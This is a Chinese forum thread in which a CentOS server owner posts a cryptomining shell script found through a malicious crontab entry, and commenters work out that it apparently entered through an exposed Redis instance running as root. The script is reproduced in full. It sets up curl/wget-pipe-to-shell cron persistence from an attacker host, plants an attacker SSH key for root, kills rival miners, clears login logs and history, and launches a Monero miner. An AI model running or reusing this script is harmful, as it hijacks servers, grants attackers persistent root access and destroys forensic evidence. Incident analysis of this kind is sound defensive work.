系统 centos7

今天看到服务器报警 68%的 cpu 被用。我也没干嘛啊。 用 htop 看到如下：

很浪啊，赶紧 kill -9 杀掉进程，单一下子就有起来了。 灵光一闪，查看 crontab，如图: 用 crontab 里的链接下载了这个 sh：

#!/bin/bash
ps -ef | grep crypto-pool | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep nanopool | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep supportxmr | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep minexmr | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep dwarfpool | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep xmrpool | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep moneropool | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep xmr | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep monero | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep udevs | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep kworkers | grep -v grep | awk '{print $2}' | xargs kill -9
skill -KILL udevs
skill -KILL kworkers
rm -rf /var/lib/apt/lists/*
apt-get update
apt-get install wget -y
apt-get install libcurl4-openssl-dev -y
apt-get install python-pip -y
apt-get install ca-certificates -y
apt-get install redis-tools -y
apt-get install python gcc -y
apt-get install python-setuptools python-dev build-essential -y --allow-unauthenticated
yum -y install epel-release
yum -y install wget gcc redis git python-pip ca-certificates
echo "0 * * * * curl -fsSL http://chrome.zer0day.ru:5050/mrx1 | sh" > /var/spool/cron/root
echo "0 * * * * wget -q -O- http://chrome.zer0day.ru:5050/mrx1 | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
mkdir -p /root/.ssh/
echo "0 * * * * curl -fsSL http://chrome.zer0day.ru:5050/mrx1 | sh" > /var/spool/cron/crontabs/root
echo "0 * * * * wget -q -O- http://chrome.zer0day.ru:5050/mrx1 | sh" >> /var/spool/cron/crontabs/root
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDV1VxPVZFUOOWZwMFVBwP/904lhAZNj2U5DPsZyIWw33jHeFRElM++XnUYmkMDiu8KuJXnFDJMkyXxsq77fOpDhVGOoexll3+P6SmZWViWwnhOgvxhccgT72J+LPZEIwPqPZQVHR4ksdVSnMVreyZs+rQ7O+L2xychpqzeIrk4Q/08f5XreOnq4Rgxp9oKwSlf7vKmQ7tUWUxfMHHL1wQYZPmdKpgSi/JmokLpp5cKAT7r0gGOj1jV8ZAJc+z45Ts2JBH9JYscHBssh7MBWWymcjXANd9a6XaQnbnl6nOFFNyYm8dBuLkGpEUNCdMq/jc5YLfnAnbGVbBMhuWzaWUp [email protected]" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
PS3=$(iptables -L | grep 6379 | wc -l)
if [ $PS3 -eq 0 ];
then
yum -y install iptables-services
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT
service iptables save
/etc/init.d/iptables-persistent save
fi
echo "" > /var/log/wtmp
echo "" > /var/log/secure
history -c
if [ ! -f "/tmp/migrations" ];then
wget https://transfer.sh/SstPD/clay  --no-check-certificate -O /tmp/clay && chmod +x /tmp/clay
wget https://transfer.sh/q4oJN/nodexx --no-check-certificate -O /tmp/migrations && chmod 777 /tmp/migrations
curl -sk https://transfer.sh/q4oJN/nodexx -o /tmp/migrations && chmod 777 /tmp/migrations
fi
cd /tmp
PS1=$(ps aux | grep clay | grep -v "grep" | wc -l)
if [ $PS1 -eq 0 ];
then
    /tmp/clay &
fi
PS2=$(ps aux | grep migrations | grep -v "grep" | wc -l)
if [ $PS2 -eq 0 ];
then
    /tmp/migrations -o stratum+tcp://pool.zer0day.ru:8080 --max-cpu-usage 85 -k -B
fi
if [ $? -ne 0 -a $PS2 -eq 0 ];
then
wget https://transfer.sh/pQMdB/glibc-2.14.tar.gz --no-check-certificate -O /tmp/glibc-2.14.tar.gz && tar zxvf /tmp/glibc-2.14.tar.gz -C / && export LD_LIBRARY_PATH=/opt/glibc-2.14/lib:$LD_LIBRARY_PATH && /tmp/migrations -o stratum+tcp://pool.zer0day.ru:8080 --max-cpu-usage 85 -k -B && echo "" > /var/log/wtmp && echo "" > /var/log/secure && history -c 
fi
if [ $PS3 -eq 0 ];
then
yum -y install iptables-services
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT
service iptables save
/etc/init.d/iptables-persistent save
fi

各位猜猜他是不是要挖矿。 我现在只是把外网用防火墙给卡断了，想仔细研究研究他到底在干嘛

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDV1VxPVZFUOOWZwMFVBwP/904lhAZNj2U5DPsZyIWw33jHeFRElM++XnUYmkMDiu8KuJXnFDJMkyXxsq77fOpDhVGOoexll3+P6SmZWViWwnhOgvxhccgT72J+LPZEIwPqPZQVHR4ksdVSnMVreyZs+rQ7O+L2xychpqzeIrk4Q/08f5XreOnq4Rgxp9oKwSlf7vKmQ7tUWUxfMHHL1wQYZPmdKpgSi/JmokLpp5cKAT7r0gGOj1jV8ZAJc+z45Ts2JBH9JYscHBssh7MBWWymcjXANd9a6XaQnbnl6nOFFNyYm8dBuLkGpEUNCdMq/jc5YLfnAnbGVbBMhuWzaWUp [email&>> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
这一条很是邪恶啊

拽了

我说一楼

看样子的确是被拿来挖矿了，看命令是用了一个未授权访问的 redis 漏洞（因为替你把 6379 关上不让别人搞）

xmr 门罗币

pool.zer0day.ru:8080 这个好像是挖矿的。找到漏洞了吗怎么被搞的？

被拿来挖矿了

良心黑产脚本？

被人拿来当矿机了
很奇怪的是你这机子允许 root 帐号远程登录？

Stratum 字样挖矿无疑
有可能是 ssh 密码破解搞进来的，别的弱密码也可能，1day 漏洞也可能看你更新不。

```
/tmp/migrations -o stratum+tcp://pool.zer0day.ru:8080 --max-cpu-usage 85 -k -B
```
还保留了 15%CPU 给你用，良心啊

echo "" > /var/log/wtmp
echo "" > /var/log/secure
history -c

见过个类似的，看看是不是 redis 开了外网访问但是没设密码或者弱密码或或者配置文件有误未生效

不是这是内网的电脑，当时通过代理，把 6379 端口 redis 代理出去了。redis 是用 root 运行的。

尴尬，哈哈

前几天服务器刚中了挖门罗币的病毒，而且用的还是 docker 来跑的。。。

被挖矿了？

不是良心，是怕被别家黑客工具用了，竞争也很激烈啊。

我前几天配置的 SS 也被黑了用作 ddos，客服发 email 说关停了我的机器，我上去一看，几个小时打了 300G 流量。。。。。 也不知道是如何黑的，后来果断重新弄了一台，关了 root 远程登录，关闭密码登陆。

估计是 ssh 被爆破进入的

看了这个，我竟然想到的是拿我闲置的服务器来挖门罗币，不知道能挖多少。。。

migrations -o stratum+tcp://pool.zer0day.ru:8080 --max-cpu-usage 85 -k -B
这条命令已经说明是在挖矿了

+1, 刚想回这个, 这条 hhh

求解这条是什么意思

一项喜欢用 keys 登陆 ssh，就差两步验证了

然而即便留了 15% 很多商家还是会直接把这样的 vps 给 suspend 了 #滑稽

照这么说，我手上有 3 台服务器，都是闲置的，我也该去试试挖矿？

直接加入自己的密钥,可以随时登录了,不需要密码

免密码 登陆

你是不是用 root 启动 redis 了并且对外网是开放的？

这是服务器被入侵，同时用于挖矿的步骤啊。
要杜绝还得找服务器漏洞的根源，然后再去堵。

前段时间研究过 redis 漏洞，但新版本貌似怎么都不能生效，楼主 redis 版本是多少？
有可疑 key 之类的一些信息吗，有的话麻烦提供一下大家研究研究

最简单的方式，云墙 设置下 ssh 端口么？ ip 或者 IP 段放行。
挖门罗的
打算挖的，给你个参考，G620 CentOS 倆核算力 50，如果支持 aes 能快不少。但是 cpu 自己挖电费回不来，矿池一般 0.3 提，这算力基本一年提不出来。

让我想起我司一台测试服务器上的 redis 没有设置密码 然后因为版本也不是最新的 就被人利用漏洞种过挖矿程序

你怎么理解到良心的，明显怕后来人把自己蹬了啊。

stratum+tcp://pool.zer0day.ru:8080 必然是挖矿啊

我也被黑锅，cpu 占用了 100%

我之前查日志菜发现 只被用了 50%，这不算良心

有点意思，这个。。

无密码全球公开 root 账户运行的 redis，不拿来挖矿难道还留着过年？

挖门罗币种的
开 ssh，让我上去也挖挖

一般 VPS 都会禁止挖矿的

上次我的 Linode 也流量暴涨，后来只开放必要端口就好了

挖矿的，应该是利用 redis 端口漏洞进来的，因为 redis 默认是不用用户密码的

被偷挖挖门罗币了